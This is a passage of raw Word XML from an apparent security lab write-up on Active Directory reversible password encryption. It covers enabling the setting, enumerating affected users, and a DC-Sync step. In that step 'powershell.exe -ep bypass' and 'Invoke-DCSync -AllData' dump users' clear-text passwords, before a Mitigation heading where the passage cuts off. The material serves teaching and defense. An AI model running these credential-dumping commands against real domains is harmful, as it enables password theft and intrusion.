          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="800000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
        <w:t>Lab Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1F31D3" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Enabling Reversible encryption in Active Directory Users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC72C51" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>There are multiple methods to enable Reversible encryption property:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FBEFE7" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>User Account Property</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2F278B" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>Enable the Reversible encryption by modifying the account property for the Domain User account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050CC2EF" w14:textId="77B82DC4"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noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29879839" wp14:editId="18225233">
            <wp:extent cx="5731510" cy="638683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6386830"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="559F1095" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524C0217" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>set-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ADUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AllowReversiblePasswordEncryption</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-k1"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="286491"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="48F8FDA7" w14:textId="1AB4118B"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noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51E779B4" wp14:editId="62B6D271">
            <wp:extent cx="5676900" cy="7924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76900" cy="792480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1327CC95" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Group Policy Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E02C98" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>Enable the store password using reversible encryption with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Computer Configuration\Windows Settings\Security Settings\Account Policies\Password Policy\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1BB376" w14:textId="59355CE3" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="75"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3834D4AB" wp14:editId="56175C1B">
            <wp:extent cx="5731510" cy="202819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028190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C0939B" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Validate the property through User’s </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">-Attribute Editor for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>UserAccountControl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EB5DB3" w14:textId="0DF52488"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noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DCF7BA3" wp14:editId="217E865B">
            <wp:extent cx="3924300" cy="52120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24300" cy="5212080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E76854E" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>NOTE: Now if the system Administrator reset the password for the user account, an adversary may be able to obtain the plaintext of passwords created/changed after the property was enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E4C84B" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="75"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="800000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
        <w:t>Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE4BF9C" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>PowerShell Command to find user enabled with allow reversible password encryption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14979FC3" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ADUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Filter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-g1"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="777777"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AllowReversiblePasswordEncryption</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>eq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-s0"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="DD1144"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"true"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-g1"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="777777"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-g0"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="777777"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Select Name, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sAMAccountName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="17D8B862" w14:textId="47ED5421"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noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BC6FC0B" wp14:editId="28B1CC0A">
            <wp:extent cx="5731510" cy="92329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923290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70265872" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="75"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="800000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
        <w:t>Attack: DC-Sync</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1C0D3F" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">In our Previous article, we described the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>DCsync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack, read more from </w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>. You can download the DC Sync Script tool </w:t>
      </w:r>
      <w:hyperlink r:id="rId35" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7134D8DD" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>Commands to execute in the domain controller to check the user’s clear text password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13709238" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>powershell.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -ep bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A6329A" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Import-Module .\Invoke-DCSync.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F029FD" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>DCSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AllData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3287CC44" w14:textId="0064BCC0"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noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BC03E6A" wp14:editId="604634CE">
            <wp:extent cx="5731510" cy="80899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808990"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB42220" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>DCSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> shows the clear-text password of the target user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8DDBCB" w14:textId="64230EDF"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noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39272B45" wp14:editId="52DF85F6">
            <wp:extent cx="4465320" cy="60502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65320" cy="6050280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00360777" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="75"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="800000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
        <w:t>Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C91881" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
